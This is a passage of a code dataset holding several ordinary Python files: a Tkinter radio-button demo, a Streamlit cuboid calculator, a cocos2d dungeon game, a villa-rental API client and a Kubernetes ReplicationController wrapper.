Tk()\nwindow.title('radio')\n#Create a frame inside the window\nframe = Frame(window)\n\n#Create a variable to store the value of the selected radio button\nbook = StringVar()\n\n#Create the radio buttons\nradio_1 = Radiobutton(frame, text = 'HTML5', variable = book, value='Book HTML5')\nradio_2 = Radiobutton(frame, text = 'CSS', variable = book, value='Book CSS')\nradio_3 = Radiobutton(frame, text = 'JS', variable = book, value='Book js')\nradio_4 = Radiobutton(frame, text = 'C++', variable = book, value='Book C++')\n\n#Preselect the first radio button\nradio_1.select()\n\n#Create the callback function for the button\ndef dialog():\n #Show the choice in a message box\n box.showinfo('Selection', 'Choice '+book.get())\n\n#Create the button\nbtn = Button(frame, text='Choice', command = dialog)\n\n#Layout parameters\nbtn.pack(side=RIGHT, padx = 5)\n\nradio_1.pack(side = LEFT)\nradio_2.pack(side = LEFT)\nradio_3.pack(side = LEFT)\nradio_4.pack(side = LEFT)\n\nframe.pack(padx = 30, pady = 30)\n\n#Start the window event loop\nwindow.mainloop()","sub_path":"radiob.py","file_name":"radiob.py","file_ext":"py","file_size_in_byte":1321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
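The radiob.py record just above illustrates the shared-variable pattern for Tkinter radio buttons: every Radiobutton writes its own value into one StringVar, so a single get() call reads the current selection. A stripped-down sketch of just that mechanism (button texts and values are arbitrary):

import tkinter as tk

root = tk.Tk()
# One variable shared by all the radio buttons; preselect the first value.
choice = tk.StringVar(value='Book HTML5')

for text, value in [('HTML5', 'Book HTML5'), ('CSS', 'Book CSS'), ('JS', 'Book js')]:
    # Selecting any button stores its `value` in the shared variable.
    tk.Radiobutton(root, text=text, variable=choice, value=value).pack(side=tk.LEFT)

# Reading the shared variable returns whichever option is selected.
tk.Button(root, text='Choice', command=lambda: print(choice.get())).pack(side=tk.RIGHT)
root.mainloop()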
+{"seq_id":"90896061","text":"import streamlit as st\r\nfrom streamlit_option_menu import option_menu\r\nimport math\r\nimport source.title_1 as head\r\ndef cuboid_1():\r\n head.title()\r\n st.markdown(\"

Problem Statement: Application to find the Surface Area and Volume of the Cuboid

\", unsafe_allow_html=True)\r\n st.markdown(\"
\",unsafe_allow_html=True)\r\n w1,col1,col2,w2=st.columns((1,2,2,1))\r\n us1,bc1,bc2,us2=st.columns((4,3,3,6))\r\n with col1:\r\n st.markdown(\"\")\r\n st.write(\"# Enter the length \")\r\n st.markdown(\"### \")\r\n st.write(\"# Enter the Breadth \")\r\n st.markdown(\"### \")\r\n st.write(\"# Enter the Height \")\r\n st.markdown(\"### \")\r\n st.write(\"# Select\")\r\n # ------------to create the function to clear the input-----------#\r\n with bc2:\r\n st.markdown(\"\")\r\n st.markdown(\"\")\r\n def clear_text():\r\n st.session_state[\"Clear_Square\"] = 0\r\n st.session_state[\"Clear_breadth\"] = 0\r\n st.session_state[\"Clear_Height\"] = 0\r\n st.session_state[\"cubiod_selectbox\"] = \"Surface Area\"\r\n st.button(\"Clear\", on_click=clear_text) \r\n with col2:\r\n vAR_input_length=st.number_input(\"\",min_value=0.00,step=1.0,key=\"Clear_length\") \r\n vAR_input_breadth=st.number_input(\"\",min_value=0.00,step=1.0,key=\"Clear_breadth\")\r\n vAR_input_Height=st.number_input(\"\",min_value=0.00,step=1.0,key=\"Clear_Height\") \r\n selected = st.selectbox(\"\",\r\n [\"Surface Area\",\"Volume\",\"Space diagonal\"],key=\"cubiod_selectbox\")\r\n\r\n \r\n #-----cuboid-------#\r\n with bc1:\r\n st.markdown(\"\")\r\n st.markdown(\"\")\r\n if st.button(\"Submit\"):\r\n with col2:\r\n if vAR_input_breadth and vAR_input_Height and vAR_input_length !=0:\r\n if selected == 'Surface Area':\r\n vAR_Surface_area = 2 * ( vAR_input_length * vAR_input_breadth + vAR_input_breadth * vAR_input_Height + vAR_input_Height * vAR_input_length)\r\n vAR_Surface_area = round(vAR_Surface_area,2)\r\n st.success(vAR_Surface_area)\r\n elif selected == \"Volume\": \r\n vAR_Volume = (vAR_input_length * vAR_input_breadth * vAR_input_Height)\r\n vAR_Volume = round(vAR_Volume,2)\r\n st.success(vAR_Volume)\r\n elif selected == \"Space diagonal\": \r\n vAR_Space_diagonal = math.sqrt(vAR_input_length**2 + vAR_input_breadth**2 + vAR_input_Height**2)\r\n vAR_Space_diagonal = round(vAR_Space_diagonal,2)\r\n st.success(vAR_Space_diagonal) \r\n else:\r\n st.error(\"Error\")\r\n with col1:\r\n st.write(\"# Result \")\r\n","sub_path":"Streamlitapp/Grade-09/source/Cuboid.py","file_name":"Cuboid.py","file_ext":"py","file_size_in_byte":2997,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"327393808","text":"#\n# Write in python 3.4\n#\n\nimport cocos\nimport pyglet\n\nfrom pyglet.gl import *\n\nfrom run_game import game_update, on_pickup_grabbed\nfrom run_game import on_key_press as game_on_key_press\nfrom maze import Maze\nfrom data import TILE_SIZE, SCREEN_SIZE, SCALE_FACTOR, ACTION_TIME\n\nGROUND_IMAGE_PATH = r'assets/ground.png'\nOBSTACLE_IMAGE_PATH = r'assets/obstacle.png'\nGOAL_IMAGE_PATH = r'assets/goal.png'\n\nGROUND = 'ground'\nOBSTACLE = 'obstacle'\nMONSTER = 'monster'\nGOAL = 'goal'\n\nMONSTER_IDLE = 0.95\n\n\nclass Direction(object):\n north = (0, 1)\n south = (0, -1)\n east = (1, 0)\n west = (-1, 0)\n\nHERO_IMAGES_PATHS = {\n Direction.north: r'assets/hero_n.png',\n Direction.south: r'assets/hero_s.png',\n Direction.east: r'assets/hero_e.png',\n Direction.west: r'assets/hero_w.png'}\n\nclass Pickup(cocos.sprite.Sprite):\n\n def __init__(self, image_path, pickup_type=0):\n super().__init__(\n pyglet.image.load(image_path), (0, 0), anchor=(TILE_SIZE[0]/2, -TILE_SIZE[1] / 3))\n self.dungeon = None\n self.position = (0, 0)\n self.dungeon_position = (0, 0)\n self.pickup_type = pickup_type\n\n def grab(self):\n on_pickup_grabbed(self, self.dungeon.hero, 
self.dungeon.monsters)\n\nclass Monster(cocos.sprite.Sprite):\n\n def __init__(self, image_path):\n super().__init__(\n pyglet.image.load(image_path), (0, 0), anchor=(TILE_SIZE[0]/2, -TILE_SIZE[1] / 3))\n self.dungeon = None\n self.__action = None\n self.__actions = []\n self.__current_action = None\n self.position = (0, 0)\n self.dungeon_position = (0, 0)\n\n self.new_action = None\n\n self.hp = 10\n self.damage = 0\n\n def killed(self):\n for index, monster in enumerate(self.dungeon.monsters):\n if self == monster:\n self.dungeon.monsters[index].kill()\n del self.dungeon.monsters_position[index]\n del self.dungeon.monsters[index]\n\n def __move(self, move):\n new_position = self.dungeon_position[0] + move[0], self.dungeon_position[1] + move[1]\n if self.dungeon.is_tile_free_monster(new_position):\n if new_position != self.dungeon.hero_position:\n move_by = TILE_SIZE[0] * move[0], TILE_SIZE[1] * move[1]\n action = cocos.actions.MoveBy(move_by, ACTION_TIME)\n self.new_action = action\n self.dungeon_position = \\\n new_position\n self.dungeon.update_monster_position()\n\n def get_free_direction(self):\n directions = [Direction.north, Direction.south, Direction.west, Direction.east]\n free = []\n\n for direction in directions:\n position = \\\n self.dungeon_position[0] + direction[0], self.dungeon_position[1] + direction[1]\n if self.dungeon.is_tile_free_monster(position):\n if position != self.dungeon.hero_position and position not in self.dungeon.pickups_position:\n free.append(direction)\n return free\n\n def is_tile_free(self, direction_name):\n direction = None\n if direction_name.lower() == \"up\":\n direction = Direction.north\n elif direction_name.lower() == \"down\":\n direction = Direction.south\n elif direction_name.lower() == \"left\":\n direction = Direction.west\n elif direction_name.lower() == \"right\":\n direction = Direction.east\n position = self.dungeon_position[0] + direction[0], self.dungeon_position[1] + direction[1]\n return self.dungeon.is_tile_free_monster(position) and position != self.dungeon.hero_position and position not in self.dungeon.pickups_position\n\n def move_in_direction(self, direction):\n self.__move(direction)\n\n def up(self):\n self.__move(Direction.north)\n\n def down(self):\n self.__move(Direction.south)\n\n def left(self):\n self.__move(Direction.west)\n\n def right(self):\n self.__move(Direction.east)\n\n def get_pos(self):\n return self.position\n\n def append_action(self, action):\n if self.__action:\n self.__action = self.__action + action\n else:\n self.__action = action\n\n def idle(self):\n action = cocos.actions.interval_actions.ScaleTo(MONSTER_IDLE, ACTION_TIME/2)\n action = action + cocos.actions.interval_actions.ScaleTo(1., ACTION_TIME/2)\n self.append_action(action)\n\n def go(self):\n if self.__action:\n self.do(self.__action)\n self.__action = None\n\n def update(self):\n pass\n\n\nclass Hero(cocos.sprite.Sprite):\n\n def __init__(self):\n hero_image = pyglet.image.load(HERO_IMAGES_PATHS[Direction.north])\n super().__init__(hero_image, (0, 0), anchor=(0, -TILE_SIZE[1] / 3))\n\n self.dungeon = None\n self.sens = Direction.north\n self.__action = None\n self.__actions = []\n self.__current_action = None\n\n self.__images = []\n\n self.hp = 10\n self.damage = 0\n\n self.__moves = {\n Direction.north: cocos.actions.MoveBy((0, TILE_SIZE[1]), ACTION_TIME),\n Direction.south: cocos.actions.MoveBy((0, -TILE_SIZE[1]), ACTION_TIME),\n Direction.west: cocos.actions.MoveBy((-TILE_SIZE[0], 0), ACTION_TIME),\n Direction.east: 
cocos.actions.MoveBy((TILE_SIZE[0], 0), ACTION_TIME),\n }\n\n\n def __append_action(self, action):\n if self.__action:\n self.__action = self.__action + action\n else:\n self.__action = action\n\n def __change_image(self):\n image = self.__images.pop(0)\n self.image = image\n\n def __accept_keys(self):\n self.dungeon.accept_key = True\n\n def get_pos(self):\n return self.dungeon.hero_position\n\n def is_tile_free(self):\n return self.dungeon.is_tile_free(self.sens)\n\n def is_at_goal(self):\n return self.dungeon.is_at_goal()\n\n def move(self):\n if self.dungeon.hero_move(self.sens):\n action = self.__moves[self.sens]\n self.__append_action(action)\n self.__append_action(\n cocos.actions.instant_actions.CallFunc(self.__accept_keys))\n game_update(self, self.dungeon.monsters)\n self.dungeon.monsters_moves()\n\n def turn_right(self):\n if self.sens == Direction.north:\n self.sens = Direction.east\n elif self.sens == Direction.east:\n self.sens = Direction.south\n elif self.sens == Direction.south:\n self.sens = Direction.west\n else:\n self.sens = Direction.north\n\n image = pyglet.image.load(HERO_IMAGES_PATHS[self.sens])\n self.__images.append(image)\n action = cocos.actions.instant_actions.CallFunc(self.__change_image)\n action += cocos.actions.instant_actions.CallFunc(self.__accept_keys)\n self.__append_action(action)\n\n def turn_left(self):\n if self.sens == Direction.north:\n self.sens = Direction.west\n elif self.sens == Direction.east:\n self.sens = Direction.north\n elif self.sens == Direction.south:\n self.sens = Direction.east\n else:\n self.sens = Direction.south\n\n image = pyglet.image.load(HERO_IMAGES_PATHS[self.sens])\n self.__images.append(image)\n action = cocos.actions.instant_actions.CallFunc(self.__change_image)\n action += cocos.actions.instant_actions.CallFunc(self.__accept_keys)\n self.__append_action(action)\n\n def go(self):\n if self.__action:\n self.dungeon.accept_key = False\n self.do(self.__action)\n self.__action = None\n\n\nclass DungeonTileSet(cocos.tiles.TileSet):\n\n def __init__(self):\n super(DungeonTileSet, self).__init__(id=0, properties={})\n\n ground_image = pyglet.image.load(GROUND_IMAGE_PATH)\n glTexParameteri(ground_image.texture.target, GL_TEXTURE_MAG_FILTER, GL_NEAREST)\n glTexParameteri(ground_image.texture.target, GL_TEXTURE_MIN_FILTER, GL_NEAREST)\n\n obstacle_image = pyglet.image.load(OBSTACLE_IMAGE_PATH)\n glTexParameteri(obstacle_image.texture.target, GL_TEXTURE_MAG_FILTER, GL_NEAREST)\n glTexParameteri(obstacle_image.texture.target, GL_TEXTURE_MIN_FILTER, GL_NEAREST)\n\n goal_image = pyglet.image.load(GOAL_IMAGE_PATH)\n glTexParameteri(goal_image.texture.target, GL_TEXTURE_MAG_FILTER, GL_NEAREST)\n glTexParameteri(goal_image.texture.target, GL_TEXTURE_MIN_FILTER, GL_NEAREST)\n\n ground_properties = {'obstacle': False, 'goal': False}\n obstacle_properties = {'obstacle': True, 'goal': False}\n goal_properties = {'obstacle': False, 'goal': True}\n\n self.add(ground_properties, ground_image, GROUND)\n self.add(obstacle_properties, obstacle_image, OBSTACLE)\n self.add(goal_properties, goal_image, GOAL)\n\n\nclass Game(cocos.scene.Scene):\n\n def __init__(self, dungeon_size):\n window = cocos.director.director.init(\n width=SCREEN_SIZE[0], height=SCREEN_SIZE[1], autoscale=True, caption='Level 1')\n window.set_size(SCREEN_SIZE[0]*SCALE_FACTOR, SCREEN_SIZE[1]*SCALE_FACTOR)\n\n super(Game, self).__init__()\n self.dungeon = Dungeon(dungeon_size)\n\n # layer initialisation\n self.character_layer = cocos.layer.Layer()\n self.add(self.dungeon)\n 
self.add(self.character_layer)\n\n # character initialisation\n self.hero = Hero()\n self.character_layer.add(self.hero)\n self.dungeon.add_hero(self.hero)\n\n def add_pickup(self, pickup, position):\n self.character_layer.add(pickup)\n self.dungeon.add_pickup(pickup, position)\n\n def add_monster(self, monster, position):\n self.character_layer.add(monster)\n self.dungeon.add_monster(monster, position)\n\n def draw(self, *args, **kwargs):\n glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_MAG_FILTER, GL_NEAREST)\n glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_MIN_FILTER, GL_NEAREST)\n super().draw(*args, **kwargs)\n\n def set_view(self, screen_size):\n\n self.dungeon.set_view()\n center = (int(screen_size[0] / 2), int(screen_size[1] / 2))\n dungeon_size = self.dungeon.dungeon_size\n\n origin = (\n center[0] - int(dungeon_size[0] / 2 * TILE_SIZE[0]),\n int(center[1] - dungeon_size[1] / 2 * TILE_SIZE[1]))\n\n self.position = origin\n\n def run(self):\n self.set_view(SCREEN_SIZE)\n cocos.director.director.run(self)\n\n\nclass Dungeon(cocos.tiles.RectMapLayer):\n\n is_event_handler = True\n\n def __init__(self, dungeon_size):\n self.dungeon_size = dungeon_size\n\n self.__cells = []\n self.tiles = []\n self.tileset = DungeonTileSet()\n\n self.__build()\n # self.__build_maze()\n self.__apply_tileset()\n\n self.hero = None\n self.hero_position = None\n self.monsters = []\n self.monsters_position = []\n self.pickups = []\n self.pickups_position = []\n\n self.accept_key = True\n\n super(Dungeon, self).__init__('dungeon', TILE_SIZE[0], TILE_SIZE[1], self.__cells)\n\n def update_monster_position(self):\n self.monsters_position = []\n for monster in self.monsters:\n self.monsters_position.append(monster.dungeon_position)\n\n def monsters_moves(self):\n for monster in self.monsters:\n if monster.new_action:\n monster.append_action(monster.new_action)\n monster.new_action = None\n else:\n monster.idle()\n monster.go()\n\n def add_monster(self, monster, position):\n self.monsters_position.append(position)\n monster.dungeon_position = position\n monster.position = position[0] * TILE_SIZE[0] + TILE_SIZE[0]/2, position[1] * TILE_SIZE[1]\n self.monsters .append(monster)\n monster.dungeon = self\n\n\n def add_pickup(self, pickup, position):\n self.pickups_position.append(position)\n pickup.dungeon_position = position\n pickup.position = position[0] * TILE_SIZE[0] + TILE_SIZE[0]/2, position[1] * TILE_SIZE[1]\n self.pickups.append(pickup)\n pickup.dungeon = self\n\n def add_hero(self, hero):\n self.hero = hero\n\n self.hero.position = self.__begin_postion()\n self.hero_position = self.dungeon_size[0] - 2, 1\n hero.dungeon = self\n\n def __build_maze(self):\n self.__cells = []\n\n maze = Maze(*self.dungeon_size)\n self.dungeon_size = (maze.size_x, maze.size_y)\n\n for x in range(self.dungeon_size[0]):\n column = []\n cells_column = []\n for y in range(self.dungeon_size[1]):\n if x == 1 and y == self.dungeon_size[1] - 2:\n column.append(GOAL)\n elif maze.cells[x][y] == 1:\n column.append(OBSTACLE)\n else:\n column.append(GROUND)\n cells_column.append(None)\n\n self.__cells.append(cells_column)\n self.tiles.append(column)\n\n def __build(self):\n self.__cells = []\n\n for x in range(self.dungeon_size[0]):\n column = []\n cells_column = []\n for y in range(self.dungeon_size[1]):\n if x == 0 or x == self.dungeon_size[0] - 1 \\\n or y == 0 or y == self.dungeon_size[1] - 1:\n column.append(OBSTACLE)\n elif x == 1 and y == self.dungeon_size[1] - 2:\n column.append(GOAL)\n elif (y+x) % 3 == 0 and x % 2 == 0 and x != 
self.dungeon_size[0] - 2 \\\n or x == 1 and y == self.dungeon_size[1] - 5 and y != 1:\n column.append(OBSTACLE)\n else:\n column.append(GROUND)\n cells_column.append(None)\n\n self.__cells.append(cells_column)\n self.tiles.append(column)\n\n def __apply_tileset(self):\n for x in range(self.dungeon_size[0]):\n for y in range(self.dungeon_size[1]):\n self.__cells[x][y] = cocos.tiles.RectCell(\n x, y, TILE_SIZE[0], TILE_SIZE[1], {}, self.tileset[self.tiles[x][y]])\n\n def __begin_postion(self):\n x, y = self.dungeon_size[0] - 2, 1\n return x * TILE_SIZE[0], y * TILE_SIZE[1]\n\n def __monster_in_position(self, position):\n\n if position in self.monsters_position:\n return True\n return False\n\n def __pickup_in_position(self, position):\n\n if position in self.pickups_position:\n return True\n return False\n\n def __tile_properties(self, position):\n x, y = position\n return self.tileset[self.tiles[x][y]].properties\n\n def set_view(self):\n\n super(Dungeon, self).set_view(\n 0,\n 0,\n self.dungeon_size[0] * TILE_SIZE[0],\n self.dungeon_size[1] * TILE_SIZE[1])\n\n def hero_move(self, move):\n\n new_position = self.hero_position[0] + move[0], self.hero_position[1] + move[1]\n if self.__tile_properties(new_position)[OBSTACLE]:\n return False\n elif self.__monster_in_position(new_position):\n for index, position in enumerate(self.monsters_position):\n if position == new_position:\n monster = self.monsters[index]\n monster.hp -= self.hero.damage\n self.hero.hp -= monster.damage\n return False\n elif self.__pickup_in_position(new_position):\n for index, position in enumerate(self.pickups_position):\n if position == new_position:\n self.pickups[index].grab()\n self.pickups[index].kill()\n del self.pickups_position[index]\n del self.pickups[index]\n self.hero_position = new_position\n return True \n else:\n self.hero_position = new_position\n return True\n\n def is_position_open(self, position):\n if self.__tile_properties(position)[OBSTACLE]:\n return False\n elif self.__monster_in_position(position):\n return False\n elif self.__pickup_in_position(position):\n return False\n else:\n return True \n\n def is_tile_free(self, move):\n new_position = self.hero_position[0] + move[0], self.hero_position[1] + move[1]\n\n if self.__tile_properties(new_position)[OBSTACLE]:\n return False\n elif self.__monster_in_position(new_position):\n return False\n else:\n return True\n\n def is_tile_free_monster(self, position):\n\n if self.__tile_properties(position)[OBSTACLE]:\n return False\n elif self.__monster_in_position(position):\n return False\n else:\n return True\n\n def is_at_goal(self):\n if self.__tile_properties(self.hero_position)[GOAL]:\n return True\n else:\n return False\n\n def on_key_press (self, key, modifiers):\n \"\"\"This function is called when a key is pressed.\n 'key' is a constant indicating which key was pressed.\n 'modifiers' is a bitwise or of several constants indicating which\n modifiers are active at the time of the press (ctrl, shift,\n capslock, etc.)\n \"\"\"\n\n if self.accept_key:\n game_on_key_press(key, modifiers, self.hero)\n self.hero.go()\n","sub_path":"Exercices/Dungeon_Monters/world.py","file_name":"world.py","file_ext":"py","file_size_in_byte":17615,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"256728421","text":"import datetime\nfrom urllib.parse import (urljoin, urlparse, parse_qs, urlencode, urlunparse)\nfrom urllib.request import (urlopen)\nfrom posixpath import join as posixjoin\nfrom xml.etree import 
ElementTree as ET\n\nclass MarketingVillasUrls(object):\n # Base Components\n BASE_URL = \"http://ws.marketingvillas.com/\"\n BASE_PATH = \"/partners.asmx\"\n\n # Individual API Paths\n TIME_TOKEN_ENDPOINT = (\"/Security_GetTimeToken\", [],)\n MD5_TOKEN_ENDPOINT = (\"/Security_GetMD5Hash\", [\"p_ToHash\"],)\n VILLA_LIST_ENDPOINT = (\"/getMVLVillaList\", [\"p_Token\", \"p_UserID\"],)\n VILLA_RATES_ENDPOINT = (\"/getVillaRates\", [\"p_Token\", \"p_UserID\", \"p_VillaID\"],)\n\n\nclass MarketingVillasApi(object):\n \"\"\"\n This class encapsulates the MarketingVillas API.\n\n Each API endpoint is associated with two methods of this class, both of\n which share a similar name to the API endpoint that they work with:\n \n 1.) A public method intended for general use, which returns the data\n retrieved from the endpoint in a nominally user/code-friendly\n format specific to that endpoint (e.g. a dictionary, or a plain\n string).\n\n 2.) A private method intended for internal and specialist use, which\n does nothing more than make a call to the API with the right\n parameters, returning the bytes content of the response as-is\n (typically containing XML-formatted data). These private methods\n bear the same signature as their public counterparts, except the\n method identifier is prefixed with a single underscore.\n \"\"\"\n\n def __init__(self, user_id: str, password: str):\n self.user_id = user_id\n self.password = password\n\n\n # Utilities and common operations\n\n @classmethod\n def _construct_endpoint(cls, endpoint: tuple, get_params: dict={}) -> str:\n \"\"\"\n This function handles construction of API endpoints to be used for\n making HTTP requests. Combined with the `MarketingVillasUrls`, this\n function also verifies that the required GET parameters are being passed.\n \"\"\"\n path = endpoint[0]\n param_keys = endpoint[1]\n\n # Verify required keys are provided\n for key in param_keys:\n if key not in get_params:\n raise KeyError(key)\n\n joined_endpoint = urljoin(MarketingVillasUrls.BASE_URL, posixjoin(MarketingVillasUrls.BASE_PATH, path.lstrip(\"/\")))\n parsed_endpoint = urlparse(joined_endpoint)\n query_string = urlencode(get_params)\n result = urlunparse(parsed_endpoint._replace(query=query_string))\n return result\n\n @classmethod\n def _make_request(cls, url: str) -> bytes:\n with urlopen(url) as response:\n content = response.read()\n return content\n\n @classmethod\n def _raw_bytes_to_tree(cls, raw: bytes) -> ET.ElementTree:\n return ET.fromstring(raw.decode(\"utf8\"))\n\n\n # API endpoints wrapped in member functions\n\n def _get_time_token(self) -> bytes:\n request_uri = self._construct_endpoint(MarketingVillasUrls.TIME_TOKEN_ENDPOINT, {})\n resp = self._make_request(request_uri)\n return resp\n\n def get_time_token(self) -> str:\n tree = self._raw_bytes_to_tree(self._get_time_token())\n time_token = tree.text\n return time_token\n\n def _get_md5_token(self) -> bytes:\n tohash = \"|\".join( [self.user_id, self.password, self.get_time_token()] )\n request_uri = self._construct_endpoint(MarketingVillasUrls.MD5_TOKEN_ENDPOINT,\n {\n \"p_ToHash\": tohash\n })\n resp = self._make_request(request_uri)\n return resp\n\n def get_md5_token(self) -> str:\n tree = self._raw_bytes_to_tree(self._get_md5_token())\n md5_token = tree.text\n return md5_token\n\n def _get_villa_list(self) -> bytes:\n request_uri = self._construct_endpoint(MarketingVillasUrls.VILLA_LIST_ENDPOINT,\n {\n \"p_Token\": self.get_md5_token(),\n \"p_UserID\": self.user_id\n })\n resp = 
self._make_request(request_uri)\n return resp\n\n def get_villa_list(self) -> list:\n tree = self._raw_bytes_to_tree(self._get_villa_list())\n villas_element = tree\n villas_children = villas_element.getchildren()\n villas_list = [ {\n \"villa_id\": villa.attrib[\"villaid\"],\n \"sort_name\": villa.attrib[\"sortname\"],\n \"base_url\": villa.attrib[\"baseurl\"],\n \"name\": villa.text\n } for villa in villas_children ]\n return villas_list\n\n def _get_villa_rates(self, villa_id: str) -> bytes:\n request_uri = self._construct_endpoint(MarketingVillasUrls.VILLA_RATES_ENDPOINT,\n {\n \"p_Token\": self.get_md5_token(),\n \"p_UserID\": self.user_id,\n \"p_VillaID\": villa_id\n })\n return self._make_request(request_uri)\n\n def get_villa_rates(self, villa_id: str) -> dict:\n\n def parse_date(datestr):\n return datetime.datetime.strptime(datestr, \"%Y-%m-%dT00:00:00\")\n\n tree = self._raw_bytes_to_tree(self._get_villa_rates(villa_id))\n rates_element = tree.getchildren()[0]\n rates_children = rates_element.getchildren()\n villa_rates_obj = {\n \"villa_id\": villa_id,\n \"rate_name\": rates_children[0].text,\n \"rates\": [ {\n \"from\": parse_date(rate.find(\"From\").text),\n \"to\": parse_date(rate.find(\"To\").text),\n \"amount\": float(rate.find(\"Amount\").text),\n \"min_stay\": int(rate.find(\"MinimumNightStay\").text),\n \"percent_tax\": float(rate.find(\"PercentTax\").text),\n \"percent_rate\": float(rate.find(\"PercentRate\").text)\n } for rate in rates_children[1:] ]\n }\n return villa_rates_obj\n\n","sub_path":"pymvlapi/endpoint.py","file_name":"endpoint.py","file_ext":"py","file_size_in_byte":5928,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"263410835","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n#\n# This file is subject to the terms and conditions defined in\n# file 'LICENSE.md', which is part of this source code package.\n#\n\nimport uuid\nimport copy\nimport time\nfrom kubernetes import K8sConfig\nfrom kubernetes.K8sPodBasedObject import K8sPodBasedObject\nfrom kubernetes.K8sPod import K8sPod\nfrom kubernetes.K8sContainer import K8sContainer\nfrom kubernetes.models.v1.ReplicationController import ReplicationController\nfrom kubernetes.K8sExceptions import *\n\nSCALE_WAIT_TIMEOUT_SECONDS = 60\n\n\nclass K8sReplicationController(K8sPodBasedObject):\n\n def __init__(self, config=None, name=None, image=None, replicas=0):\n super(K8sReplicationController, self).__init__(config=config, obj_type='ReplicationController', name=name)\n\n self.model = ReplicationController(name=name, namespace=self.config.namespace)\n self.set_replicas(replicas)\n\n rc_version = str(uuid.uuid4())\n self.model.add_pod_label(k='rc_version', v=rc_version)\n selector = {'name': name, 'rc_version': rc_version}\n self.set_selector(selector)\n\n if image is not None:\n container = K8sContainer(name=name, image=image)\n self.add_container(container)\n self.model.set_pod_name(name=name)\n\n if self.config.pull_secret is not None:\n self.add_image_pull_secrets(name=self.config.pull_secret)\n\n # ------------------------------------------------------------------------------------- override\n\n def create(self):\n super(K8sReplicationController, self).create()\n self.get()\n self.wait_for_replicas(self.get_replicas())\n return self\n\n def update(self):\n super(K8sReplicationController, self).update()\n self.get()\n return self\n\n # ------------------------------------------------------------------------------------- add\n\n def 
add_annotation(self, k=None, v=None):\n self.model.add_annotation(k=k, v=v)\n return self\n\n def add_label(self, k=None, v=None):\n self.model.add_label(k=k, v=v)\n return self\n\n def add_pod_annotation(self, k=None, v=None):\n self.model.add_pod_annotation(k=k, v=v)\n return self\n\n def add_pod_label(self, k=None, v=None):\n self.model.add_pod_label(k=k, v=v)\n return self\n\n # ------------------------------------------------------------------------------------- del\n\n def del_annotation(self, k=None):\n self.model.del_annotation(k=k)\n return self\n\n def del_label(self, k=None):\n self.model.del_label(k=k)\n return self\n\n def del_pod_annotation(self, k=None):\n self.model.del_pod_annotation(k=k)\n return self\n\n def del_pod_label(self, k=None):\n self.model.del_pod_label(k=k)\n return self\n\n # ------------------------------------------------------------------------------------- get\n\n def get(self):\n self.model = ReplicationController(model=self.get_model())\n return self\n\n def get_annotation(self, k=None):\n return self.model.get_annotation(k=k)\n\n def get_annotations(self):\n return self.model.get_annotations()\n\n def get_label(self, k=None):\n return self.model.get_label(k=k)\n\n def get_labels(self):\n return self.model.get_labels()\n\n def get_namespace(self):\n return self.model.get_namespace()\n\n def get_pod_annotation(self, k=None):\n return self.model.get_pod_annotation(k=k)\n\n def get_pod_annotations(self):\n return self.model.get_pod_annotations()\n\n def get_pod_label(self, k=None):\n return self.model.get_pod_label(k=k)\n\n def get_pod_labels(self):\n return self.model.get_pod_labels()\n\n def get_replicas(self):\n return self.model.get_replicas()\n\n def get_selector(self):\n return self.model.get_selector()\n\n # ------------------------------------------------------------------------------------- set\n\n def set_annotations(self, dico=None):\n self.model.set_annotations(dico=dico)\n return self\n\n def set_labels(self, dico=None):\n self.model.set_labels(dico=dico)\n return self\n\n def set_namespace(self, name=None):\n self.model.set_namespace(name=name)\n return self\n\n def set_pod_annotations(self, dico=None):\n self.model.set_pod_annotations(new_dict=dico)\n return self\n\n def set_pod_labels(self, dico=None):\n self.model.set_pod_labels(labels=dico)\n return self\n\n def set_replicas(self, replicas=None):\n self.model.set_replicas(replicas=replicas)\n return self\n\n def set_selector(self, dico=None):\n self.model.set_selector(dico=dico)\n return self\n\n # ------------------------------------------------------------------------------------- wait for replicas\n\n def wait_for_replicas(self, replicas=None, labels=None):\n if replicas is None:\n raise SyntaxError('ReplicationController: replicas: [ {0} ] cannot be None.'.format(replicas))\n if not isinstance(replicas, int) or replicas < 0:\n raise SyntaxError('ReplicationController: replicas: [ {0} ] must be a positive integer.'.format(replicas))\n\n if labels is None:\n labels = self.get_pod_labels()\n\n name = labels.get('name', None)\n pod_list = list()\n pod_qty = len(pod_list)\n ready_check = False\n start_time = time.time()\n\n print('Waiting for replicas to scale to: [ {0} ] with labels: [ {1} ]'.format(replicas, labels))\n\n while not ((pod_qty == replicas) and ready_check):\n pod_list = self._get_pods(name=name, labels=labels)\n pod_qty = len(pod_list)\n if replicas > 0:\n pods_ready = 0\n for pod in pod_list:\n assert isinstance(pod, K8sPod)\n try:\n if pod.is_ready():\n pods_ready += 1\n 
except NotFoundException:\n # while scaling down\n pass\n if pods_ready >= len(pod_list):\n ready_check = True\n else:\n ready_check = True\n\n elapsed_time = time.time() - start_time\n if elapsed_time >= SCALE_WAIT_TIMEOUT_SECONDS: # timeout\n raise TimedOutException(\"Timed out scaling replicas to: [ {0} ] with labels: [ {1} ]\".format(replicas, labels))\n\n time.sleep(0.2)\n return self\n\n def _get_pods(self, name=None, labels=None):\n if labels is None:\n return K8sPod.get_by_name(config=self.config, name=name)\n else:\n return K8sPod.get_by_labels(config=self.config, labels=labels)\n\n # ------------------------------------------------------------------------------------- get by name\n\n @staticmethod\n def get_by_name(config=None, name=None):\n if name is None:\n raise SyntaxError('ReplicationController: name: [ {0} ] cannot be None.'.format(name))\n if not isinstance(name, str):\n raise SyntaxError('ReplicationController: name: [ {0} ] must be a string.'.format(name))\n\n if config is not None and not isinstance(config, K8sConfig):\n raise SyntaxError('ReplicationController: config: [ {0} ] must be a K8sConfig'.format(config))\n\n rc_list = list()\n data = {'labelSelector': 'name={0}'.format(name)}\n rcs = K8sReplicationController(config=config, name=name).get_with_params(data=data)\n\n for rc in rcs:\n try:\n rc_name = ReplicationController(model=rc).get_name()\n rc_list.append(K8sReplicationController(config=config, name=rc_name).get())\n except NotFoundException:\n pass\n\n return rc_list\n\n # 